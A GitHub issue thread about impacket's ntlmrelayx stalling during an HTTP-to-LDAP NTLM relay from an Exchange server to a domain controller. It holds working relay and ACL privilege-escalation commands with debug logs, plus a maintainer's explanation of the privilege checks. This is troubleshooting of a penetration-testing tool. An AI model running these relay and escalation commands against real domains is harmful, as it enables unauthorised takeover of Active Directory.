search

fortra / impacket

Impacket is a collection of Python classes for working with network protocols.
https://www.coresecurity.com
Other
13.31k stars 3.54k forks source link

ntlmrelayx: HTTP to LDAP just got stuck forever #960

Closed Andrew143413 closed 3 years ago

Andrew143413 commented 3 years ago

Configuration

impacket version: Impacket v0.9.22.dev1+20200924.183326.65cf657f Python version: Python 2.7.18 Python version: Python 3.8.5 Target OS: Linux rt 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64 GNU/Linux

Hello. I have the following configuration:

  1. Domain: TDOMAIN.XY (censored)
  2. Domain controller: DC01, 10.10.0.1, Windows Server 2012 R2 Standard 6.3 (9600), LDAP Signing Disabled
  3. Exchange server: EXCHANGE-2016-01, 10.1.0.55, Windows Server 2016 Standard 10.0 (14393)
  4. EXCHANGE-2016-01 is a member of "Exchange Trusted Subsystem" group.
  5. "Exchange Trusted Subsystem" is a member of "Exchange Windows Permissions" group.
  6. Attacking host (kali) with both Python 2.7.18 and Python 3.8.5 installed.

ntlmrelayx seems to work (ldapdomaindump sucessfully creates .json, .grep and .html files) in the beginning, but it is getting stuck after the message "[] Domain info dumped into lootdir!" whatever I tried ;(

Debug Output With Command String -- Python 2.7.18

root@rt:~# ntlmrelayx.py -smb2support -t ldap://dc01.tdomain.xy --escalate-user u.regular -debug -l /tmp/relax

root@rt:~# ntlmrelayx.py -smb2support -t ldap://dc01.tdomain.xy --escalate-user u.regular -debug -l /tmp/relax
Impacket v0.9.22.dev1+20200924.183326.65cf657f - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python2.7/dist-packages/impacket
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 10.1.0.55, attacking target ldap://dc01.tdomain.xy
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldap://dc01.tdomain.xy as TDOMAIN.XY\EXCHANGE-2016-01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[+] User is a member of: [DN: CN=Exchange Servers,OU=Security Groups,DC=TDOMAIN,DC=XY - STATUS: Read - READ TIME: 2020-09-25T00:00:00.000001
    name: Exchange Servers
    objectSid: S-1-5-21-1234567890-1234567890-1234567890-12345

--snip--
A lot of stuff here
--snip--
10 minutes later
--snip--

[*] User privileges found: Create user
[*] Dumping domain info for first time
[*] Domain info dumped into lootdir!

The same thing happens with Python3:

Debug Output With Command String -- Python 3.8.5

root@rt:~# ntlmrelayx.py -smb2support -t ldap://dc01.tdomain.xy --escalate-user u.regular -debug -l /tmp/relax

root@rt:~# ntlmrelayx.py -smb2support -t ldap://dc01.tdomain.xy --escalate-user u.regular -debug -l /tmp/relax
Impacket v0.9.22.dev1+20200924.183326.65cf657f - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python3.8/dist-packages/impacket
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 10.1.0.55, attacking target ldap://dc01.tdomain.xy
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldap://dc01.tdomain.xy as TDOMAIN.XY\EXCHANGE-2016-01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[+] User is a member of: [DN: CN=Exchange Servers,OU=Security Groups,DC=TDOMAIN,DC=XY - STATUS: Read - READ TIME: 2020-09-25T00:00:00.000001
    name: Exchange Servers
    objectSid: S-1-5-21-1234567890-1234567890-1234567890-12345

--snip--
A lot of stuff here
--snip--
10 minutes later
--snip--

[*] User privileges found: Create user
[*] Dumping domain info for first time
[*] Domain info dumped into lootdir!

pip2 list

root@rt:~# pip2 list
/usr/share/python-wheels/pkg_resources-0.0.0-py3-none-any.whl/pkg_resources/py2_warn.py:21: UserWarning: Setuptools will stop working on Python 2
************************************************************
You are running Setuptools on Python 2, which is no longer
supported and
>>> SETUPTOOLS WILL STOP WORKING <<<
in a subsequent release (no sooner than 2020-04-20).
Please ensure you are installing
Setuptools using pip 9.x or later or pin to `setuptools<45`
in your environment.
If you have done those things and are still encountering
this message, please follow up at
https://bit.ly/setuptools-py2-warning.
************************************************************
WARNING: pip is being invoked by an old script wrapper. This will fail in a future version of pip.
Please see https://github.com/pypa/pip/issues/5599 for advice on fixing the underlying issue.
To avoid this problem you can invoke Python with '-m pip' instead of running pip directly.
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Package                       Version
----------------------------- ------------------------------------
-mpacket                      0.9.22.dev1+20200924.183326.65cf657f
adns-python                   1.2.1
asn1crypto                    0.24.0
atomicwrites                  1.1.5
attrs                         19.3.0
Automat                       0.6.0
backports-abc                 0.5
backports.functools-lru-cache 1.5
BBQSQL                        1.0
bcrypt                        3.1.7
bdfproxy                      0.0.0
beautifulsoup4                4.3.2
BlindElephant                 1.0
blinker                       1.4
certifi                       2019.11.28
chardet                       3.0.4
Click                         7.0
colorama                      0.3.7
ConfigArgParse                0.13.0
configobj                     5.0.6
configparser                  3.5.0b2
constantly                    15.1.0
construct                     2.8.16
contextlib2                   0.5.5
cryptography                  2.6.1
cycler                        0.10.0
dbus-python                   1.2.16
distorm3                      3.4.1
dnspython                     1.16.0
EAPeak                        0.1.8
easygui                       0.96
EditorConfig                  0.12.1
entrypoints                   0.3
enum34                        1.1.6
et-xmlfile                    1.0.1
feedparser                    5.2.1
Flask                         1.1.1
funcsigs                      1.0.2
fuse-python                   1.0.0
future                        0.18.2
futures                       3.3.0
gevent                        1.4.0
greenlet                      0.4.15
h2                            3.0.1
hpack                         3.0.0
html2text                     2019.8.11
html5lib                      1.0.1
httplib2                      0.14.0
hyperframe                    5.2.0
hyperlink                     19.0.0
idna                          2.6
impacket                      0.9.22.dev1+20200924.183326.65cf657f
importlib-metadata            1.5.0
incremental                   16.10.1
ipaddress                     1.0.17
itsdangerous                  0.24
jdcal                         1.0
Jinja2                        2.11.2
jsbeautifier                  1.6.4
jsonpickle                    0.9.5
keepnote                      0.7.8
keyring                       18.0.1
keyrings.alt                  3.2.0
killerbee                     1.0
kiwisolver                    1.0.1
ldap3                         2.5.1
ldapdomaindump                0.9.3
lxml                          4.5.2
M2Crypto                      0.31.0
MarkupSafe                    1.1.1
matplotlib                    2.2.4
mechanize                     0.4.5
metaconfig                    0.1.4a1
more-itertools                4.2.0
msgpack                       0.5.6
mysqlclient                   1.3.10
NfSpy                         1.0
ntdsxtract                    1.3.3.20150928
numpy                         1.16.5
olefile                       0.46
openpyxl                      2.4.9
packaging                     19.1
paramiko                      2.6.0
passlib                       1.7.1
pathlib2                      2.3.5
pcapy                         0.11.4
peepdf                        0.4.2
pefile                        2019.4.18
Pillow                        6.2.1
pip                           20.0.2
pipenv                        2018.11.26
pluggy                        0.13.0
pluginbase                    0.3
psycopg2                      2.8.4
py                            1.8.1
pyasn1                        0.4.8
pyasn1-modules                0.2.1
pycairo                       1.16.2
pycrypto                      2.7a1
pycryptodomex                 3.6.1
pycurl                        7.43.0.2
PyGObject                     3.36.0
pyinotify                     0.9.6
pylibemu                      0.3.3
pylibpcap                     0.6.4
pymssql                       2.1.4
PyNaCl                        1.3.0
PyOpenGL                      3.1.0
pyOpenSSL                     19.0.0
pyparsing                     2.4.2
pyperclip                     1.6.4
PyRIC                         0.1.6
pyrit                         0.5.1
pyscard                       1.9.9
pyserial                      3.4
PySocks                       1.6.8
pysqlite                      2.7.0
pytest                        4.6.9
python-dateutil               2.7.3
python-Levenshtein            0.12.0
pythonaes                     1.0
pytz                          2020.1
pyusb                         1.0.2
PyV8                          1.0.dev0
PyX                           0.12.1
pyxdg                         0.26
qt4reactor                    1.6
rdpy                          1.3.2
requests                      2.22.0
rfidiot                       1.0
rsa                           4.0
scandir                       1.10.0
scapy                         2.4.3
service-identity              18.1.0
setuptools                    44.1.1
simplejson                    3.16.0
singledispatch                3.4.0.3
sip                           4.19.21
six                           1.15.0
soupsieve                     1.9.5
SQLAlchemy                    1.3.12
subprocess32                  3.5.4
tcpwatch                      1.3.1
tornado                       5.1.1
Twisted                       18.9.0
typing                        3.6.6
urllib3                       1.25.6
urwid                         2.0.1
uTidylib                      0.5
virtualenv                    16.4.1
virtualenv-clone              0.5.1
volatility                    2.6
wafw00f                       0.9.4
wcwidth                       0.1.8
webencodings                  0.5.1
webunit                       1.3.10
Werkzeug                      0.16.1
wheel                         0.33.6
wxPython                      3.0.2.0
wxPython-common               3.0.2.0
yara-python                   3.10.0
zenmap                        7.80
zipp                          1.0.0
zope.interface                4.6.0
root@rt:~#

pip3 list

Package                      Version                              Location
---------------------------- ------------------------------------ --------------------------------------
aiodns                       2.0.0
aiohttp                      3.6.2
ajpy                         0.0.4
alembic                      1.4.2.dev0
aniso8601                    8.0.0
apispec                      3.3.1
apispec-webframeworks        0.5.2
async-timeout                3.0.1
attrs                        19.3.0
autobahn                     17.10.1
Automat                      20.2.0
Babel                        2.8.0
backcall                     0.2.0
backdoor-factory             0.0.0
bcrypt                       3.1.7
beautifulsoup4               4.9.1
blinker                      1.4
bottle                       0.12.15
Brlapi                       0.7.0
cairocffi                    0.9.0
capstone                     3.0.5
cbor                         1.0.0
certifi                      2020.6.20
cffi                         1.14.2
Chameleon                    3.6.2
chardet                      3.0.4
chirp                        0.3.0.dev0
chrome-gnome-shell           0.0.0
click                        7.1.2
click-plugins                1.1.1
colorama                     0.4.3
configobj                    5.0.6
constantly                   15.1.0
cryptography                 3.1
cupshelpers                  1.0
Cython                       0.29.21
dbus-python                  1.2.16
decorator                    4.4.2
deprecation                  2.0.7
dhcpig                       0.0.0
dicttoxml                    1.7.4
distro                       1.5.0
distro-info                  0.23
Django                       2.2.16
dnslib                       0.9.14
dnspython                    2.0.0
email-validator              1.1.1
faraday-client               1.0.0
faraday-plugins              1.2
faradaysec                   3.12
feedparser                   5.2.1
filedepot                    0.5.2
filteralchemy                0.1.0
flasgger                     0.9.4
Flask                        1.1.2
Flask-BabelEx                0.9.4
Flask-Classful               0.14.1
Flask-KVSession-fork         0.6.3
Flask-Login                  0.5.0
Flask-Mail                   0.9.1
Flask-Principal              0.4.0
Flask-RESTful                0.3.8
Flask-Restless               0.17.0
Flask-Security-Too           3.4.2
Flask-SQLAlchemy             2.4.0
Flask-WTF                    0.14.3
future                       0.18.2
GeoIP                        1.3.2
geoip2                       2.9.0
gevent                       1.4.0
gpg                          1.14.0-unknown
greenlet                     0.4.15
grequests                    0.4.0
html2text                    2020.1.16
html5lib                     1.0.1
humanize                     2.6.0
hupper                       1.10.2
hyperlink                    19.0.0
idna                         2.10
impacket                     0.9.22.dev1+20200924.183326.65cf657f /usr/local/lib/python3.8/dist-packages
importlib-metadata           1.6.0
incremental                  16.10.1
invoke                       1.4.1
IPy                          1.0
ipython                      7.18.1
ipython-genutils             0.2.0
itsdangerous                 1.1.0
jedi                         0.17.0
Jinja2                       2.11.2
jsonschema                   3.2.0
jupyter-core                 4.6.3
KismetCaptureFreaklabsZigbee 2018.7.0
KismetCaptureRtl433          2019.9.1
KismetCaptureRtladsb         2019.10.1
KismetCaptureRtlamr          2019.10.1
ldap3                        2.8.1
ldapdomaindump               0.9.3
louis                        3.15.0
lxml                         4.5.2
lz4                          3.0.2+dfsg
M2Crypto                     0.36.0
Mako                         1.1.2
Markdown                     3.2.2
MarkupSafe                   1.1.1
marshmallow                  3.7.1
marshmallow-sqlalchemy       0.19.0
maxminddb                    1.4.1
mechanize                    0.4.5
mercurial                    5.5.1
mimerender                   0.6.0
mistune                      0.8.4
more-itertools               4.2.0
multidict                    4.7.6
mysqlclient                  1.4.4
nassl                        3.0.0
nbformat                     5.0.7
netaddr                      0.7.19
nplusone                     1.0.0
numpy                        1.19.1
olefile                      0.46
packaging                    20.4
paramiko                     2.7.2
parso                        0.7.0
passlib                      1.7.2
Paste                        3.4.3
PasteDeploy                  2.1.0
PasteScript                  2.0.2
pbkdf2                       1.3
pefile                       2019.4.18
pem                          20.1.0
pexpect                      4.6.0
pgspecial                    1.11.10
pickleshare                  0.7.5
Pillow                       6.2.1
pip                          20.0.2
plaster                      1.0
plaster-pastedeploy          0.5
plecost                      1.1.2
plotly                       4.9.0
pluginbase                   1.0.0
ply                          3.11
prettytable                  0.7.2
prompt-toolkit               3.0.7
protobuf                     3.12.3
psycopg2                     2.8.5
py-ubjson                    0.14.0
pyasn1                       0.4.8
pyasn1-modules               0.2.1
pycairo                      1.16.2
pycares                      3.1.1
pycparser                    2.20
pycrypto                     2.6.1
pycryptodomex                3.9.8
pycups                       2.0.1
pycurl                       7.43.0.2
pydot                        1.4.1
pyenchant                    2.0.0
Pygments                     2.3.1
PyGObject                    3.36.0
PyHamcrest                   1.9.0
pyinotify                    0.9.6
pymssql                      2.1.4
PyNaCl                       1.4.0
pyOpenSSL                    19.1.0
pyparsing                    2.4.7
pypng                        0.0.20
PyQRCode                     1.2.1
PyQt5                        5.15.0
pyramid                      1.10.4
PyRIC                        0.1.6.4
pyrsistent                   0.15.5
pyserial                     3.4
pysmbc                       1.0.22
pysmi                        0.3.2
pysnmp                       4.4.6
PySocks                      1.6.8
python-apt                   2.1.3
python-dateutil              2.8.1
python-editor                1.0.3
python-magic                 0.4.16
python-magic-ahupp           0.4.13
python-mimeparse             1.6.0
python-snappy                0.5.3
PyTrie                       0.2
pytz                         2020.1
pyxdg                        0.26
PyYAML                       5.3.1
redis                        3.3.11
repoze.lru                   0.7
requests                     2.23.0
requests-toolbelt            0.8.0
retrying                     1.3.3
roguehostapd                 1.1.2
rq                           1.4.0
scapy                        2.4.3
selenium                     4.0.0a1
service-identity             18.1.0
setproctitle                 1.1.10
setuptools                   46.1.3
shodan                       1.23.1
simplejson                   3.17.0
simplekv                     0.13.0
sip                          4.19.24
six                          1.15.0
soupsieve                    2.0.1
speaklater                   1.4
SQLAlchemy                   1.3.18
sqlalchemy-schemadisplay     1.3
sqlparse                     0.3.1
sslyze                       3.0.8
syslog-rfc5424-formatter     1.2.2
tabulate                     0.8.2
Tempita                      0.5.2
termcolor                    1.1.0
terminaltables               3.1.0
texttable                    1.6.2
theHarvester                 3.1.0
tld                          0.11.11
tls-parser                   1.2.2
tornado                      5.1.1
tqdm                         4.48.2
traitlets                    5.0.4
translationstring            1.4
Twisted                      18.9.0
txaio                        20.4.1
typing-extensions            3.7.4.2
u-msgpack-python             2.3.0
unattended-upgrades          0.1
unicodecsv                   0.14.1
Unidecode                    1.1.1
urllib3                      1.25.9
venusian                     3.0.0
vinetto                      0.8.0
wafw00f                      2.1.0
waitress                     1.4.1
wapiti3                      3.0.3
wcwidth                      0.1.9
webargs                      6.1.0
webencodings                 0.5.1
WebOb                        1.8.6
websocket-client             0.57.0
WebTest                      2.0.34
Werkzeug                     1.0.1
wfuzz                        2.4.5
wheel                        0.34.2
wifiphisher                  1.4
wifite                       2.5.5
wsaccel                      0.6.2
WTForms                      2.2.1
wxPython                     4.0.7
xcffib                       0.8.1
XlsxWriter                   1.1.2
yara-python                  3.10.0
yarl                         1.4.2
yaswfp                       0.9.3
zim                          0.73.2
zipp                         1.0.0
zope.component               4.3.0
zope.deprecation             4.4.0
zope.event                   4.4
zope.hookable                5.0.1
zope.interface               5.1.0
root@rt:~#

I'd appreciate any help to point me in the right direction. Thanks in advance.

dirkjanm commented 3 years ago

Attacks to LDAP automatically validate which privileges the relayed user has. It only mentions "create user" privileges, not "modify domain ACL" privileges. So likely your Exchange permissions are not vulnerable. You can also skip the permission detection and always try the ACL attack with --no-validate-privs, if that fails with access denied then you know for sure you don't have the required permissions.

Andrew143413 commented 3 years ago

Thanks for the reply @dirkjanm and thank you for your great work! I was inspired by your blog posts to look more deeply into the security challenges with Active Directory.

I've also tried to run ntlmrelayx as follows:

ntlmrelayx.py -t ldap://dc01.tdomain.xy --no-smb-server --no-dump --no-da --no-acl --escalate-user u.regular
ntlmrelayx.py -t ldap://dc01.tdomain.xy --no-smb-server --no-dump --no-da --no-acl --no-validate-privs --escalate-user u.regular

but got the same result - ntlmrelayx stucks without any error message. I don't have the output of those commands right now, but I'll recheck to ensure that I didn't miss anything.

As regard to "modify domain ACL" privilege is there a way to check manually if a machine or any user has it or not? I have domain admin privileges in dc01.tdomain.xy domain.

Thanks.

Andrew143413 commented 3 years ago

The problem was indeed caused by a lack of access rights:

ntlmrelayx.py -t ldap://dc01.tdomain.xy --no-smb-server --no-dump --no-validate-privs --escalate-user u.regular -debug
Impacket v0.9.22.dev1+20200924.183326.65cf657f - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python2.7/dist-packages/impacket
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 10.1.0.55, attacking target ldap://dc01.tdomain.xy
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against dap://dc01.tdomain.xy as TDOMAIN.XY\EXCHANGE-2016-01$ SUCCEED
[*] Assuming relayed user has privileges to escalate a user via ACL attack
[+] Performing ACL attack
[+] Found sid for user U.Regular: S-1-5-21-1234567890-1234567890-1234567890-123456
[*] Querying domain security descriptor
[-] Error when updating ACL: {'dn': u'', 'referrals': None, 'description': 'insufficientAccessRights', 'result': 50, 'message': u'00000005: SecErr: DSID-03152612, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0\n\x00', 'type': 'modifyResponse'}

Thanks to everyone who made such a great library for us!